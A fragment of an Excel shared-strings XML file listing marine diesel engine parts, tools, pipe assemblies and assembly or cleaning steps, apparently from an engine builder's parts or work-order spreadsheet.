  <si>
    <t>PNEUMATIC PRESSURE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VISCOTHERM HOUSING ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER CLEANING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER METER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrical motor w. flange, AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrical motor w. feet, AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrical pressure gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.INSTRUMENT-PRESSURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE MONITORING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFERENTIAL PRESSURESTAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.INSTRUMENT-TEMPERATURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>De-humidifier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.INSTRUMENT-VOLTAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVOLUTION COUNTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI CONTROLLER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SYNCHRONIZATION BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAINBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUP FOR FLOW CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Run-out meter, electrical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MULTI PURPOSE CONTROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HMI PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Base Module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRINTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fan assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATED WIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLES, MOUNTING INSTR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GLAND, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLETRAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRICAL PILOT UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MECHANICAL PILOT UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC PILOT UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUTOMATIC REGULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUORESCENT TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROBELIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUORESCENT LUMINAIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH 0-110 VOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH 111-...VOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, TERMINAL RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP GLASSES-MAN.CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring, compression, right-hand</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring, compression, left-hand</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SELF TAPPING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction, free Stud length</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT,ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL THREAD TOLERANCES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RORBOJLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rivet, blind</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball bearing, radial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Needle bearing, radial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS(ACCOLAN LB)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS (DLH 2) DAIDO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS (SYNTHEC) MIBA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing Makers (Tin-aluminium)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER, OVAL W HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD OF PLATE IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kantseal, w. back-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN BOX W. LEVEL SWITSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTNING/DISMOUNT. NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED STUDS &amp; BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-SILICONE PASTE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECURING OF STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIC SYMBOLS,PIPE PLANTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. SYMBOLS-PIPE PLANT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADHESIVE/SILICONE RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Classification Specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Classification Spec. HP pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Classification Spec. next</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Purchasing spec., components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE,SHAPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLARE FOR TUBES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION PAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION,MAT/ROLL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MALE STUD ELBOW COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JETASSIST BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F/I CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATION PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT. WIRING DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA SHEET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PIECE FOR YOKE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND-NOSED TOOL,RIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMF.TOOL,FORE/AFT FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MULTI-BOTTOM,UPSIDE DOWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT.DIAL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR PIN GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF MEASURING BLOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-STRAIGHT W.HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hose smooth</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Trykr?r m?ske</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING-MATERIAL,ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LONG SCREW W.SOCKET+NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATE,GAS TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compensator, fluid type</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE 0-15</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE,ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIVA Control valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spray nozzle, external thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP, PNEUM. AND HYDR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAL METER-PRESSURE UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer, dial type/ straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIGHT SLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Testing document</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Differential pressure transmitte</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORQUEACTUATOR PNEUMATIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUORESCENT LUMINA. COMPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOW.SHELLS+CRANKSH. CHECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SHAFT+TURN.WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK JOURNALS FILE OFF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE/FRAME BOX REAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRILL FOR BRACING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERS+RELIEF VALVE MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERS+RELIFE VALVE MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COWERS+RELIEF VALVE MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING MEASURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHORT STAYBOLTS FIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAINS MOUNT+ADJUST ENGI.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR: 831</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR: 833</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR: 838</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME SECTION DISMANTLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLE TOP SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP+SCRAP.RING GUARD DRIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDEWAYS IN UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FINAL ERECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER BRAKE ALIGN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANDARD INSPECTION-1610</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANDARD INSPECTION-1620</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANDARD INSPECTION-4650</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANDARD INSPECTION-4510</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER GALLERY MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER GALLERY MAN. SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UPPER GALLERY MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UPPER GALL. REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERATION MARGIN AFT RUN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERATION MARGIN AFT RUN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OF TOP SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN  DURING FINAL ERECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASS SPARES + TOOLS LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASS SPARES &amp; TOOLS LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKINGS F.INSTALL.ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN ENGINE BEF.TEST RUN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN TOP SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN CYLINDER FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OF BEDPLATE SECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OF FRAME SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRG.-ASSEMBLY SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASS SOCIETY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 00 INSTALL.DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>V-TYPE STATIONARY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE DESCRIPTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTRUC. FOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL IN BASE FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 01 BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PAN     REGISTER BLAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 101 TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 04 CUTT.PLAN-PLATELIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 02 ENGINE FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 04 SCAVENGING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 104 TOOLS-KEF ENGINES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 119 TOOLS-KEF ENGINES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERS FOR FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERM.FRAME-CAST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERM.FRAME-WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME SECTION-ALL WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 14 VAR.PARTS-FRAM.-K74</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 115 TOOLS-KEF ENGINES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARDS ON END-FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 101 TOOLS-KEF ENGINES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 06 CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 07 CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 16 AXIAL VIBR.DETUNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT FULLY-BUILT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH. ONE-PIECE FORGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 08 CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 10 PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 12 EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE ON EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 20 SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 33 CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 29 CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL FUMP + EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 32 CHAIN DRIVE-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REV.MECHANISM AND CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING(HYDRAULIC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISA TACHOMETERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOM.AND PRESS.GAUGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 36 FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 28 MANOEUVRING CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 27 REGULATING SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 42 GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 24</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 26</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 30</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 44+66</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 94</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 41</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 141</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING NOZZLE-TURBOCH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 17</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR FLYWHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL FILT.+WASTE TRAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHOMETER EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 43+92</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 93</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 142</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 143</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 52+85</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 51+82</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 47</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 48</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 49</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 50</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN SECTION 148</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARDS AT CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-UPPER-EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-UPPER-MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-LOWER-MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-LOWER-EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-CENTRE EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING-CLOCKWISE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BRG-ANTICLOCKWISE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT-ANTICLOCKWISE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL PIPE-FUEL V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FUEL O.RETURN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-COOL.O.FUEL V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN-GUARD AT FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-CAMSHAFT FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-OUTLET CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-SCAV.AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-L.O.TURBOCHAR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-LUB.O.CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL LUBRICATION-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-SCAVENGING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-THRUST BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING-CHAIN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH-CYL.LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.PIPE-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-SALT COOL.WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 902 TOOLS-PIST.ROD+BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MS 910 TOOLS-TURBO CH.SYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRE-ROTOR AND DIFFUSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE ASSEMBLY AND ROTOR</t>
